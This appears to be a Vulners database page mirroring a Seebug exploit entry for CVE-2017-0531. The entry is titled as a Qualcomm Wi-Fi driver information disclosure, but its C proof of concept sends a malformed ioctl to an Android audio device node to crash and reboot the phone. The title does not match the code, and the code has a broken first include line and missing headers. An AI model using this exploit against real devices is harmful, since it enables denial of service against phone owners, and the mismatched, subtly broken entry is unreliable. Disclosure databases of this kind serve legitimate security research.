Lucene search
+L

Google Android Qualcomm Wi-Fi Driver Multiple Information Disclosure Vulnerabilities(CVE-2017-0531)

🗓️ 04 Apr 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 46 Views

Google Android Qualcomm Wi-Fi Driver Information Disclosur

Related
Code

                                                include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define SNDRV_LSM_LAB_CONTROL	_IOW('U', 0x08, uint32_t)

int main(void)
{
	int fd;
	int ret;

	fd = open("/dev/snd/pcmC0D30c", O_RDWR);

	if (fd < 0) {
		printf("Couldn't open device, error %s\n", strerror(errno));
		return -1;
	}

	printf("Phone should be rebooting...\n");
	
	ret = ioctl(fd, SNDRV_LSM_LAB_CONTROL, 0x0B01ABADACCE55);

	close(fd);

	printf("Attack failed.\n");

	return -1;
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Apr 2017 00:00Current
5.9Medium risk
Vulners AI Score5.9
EPSS0.00891
46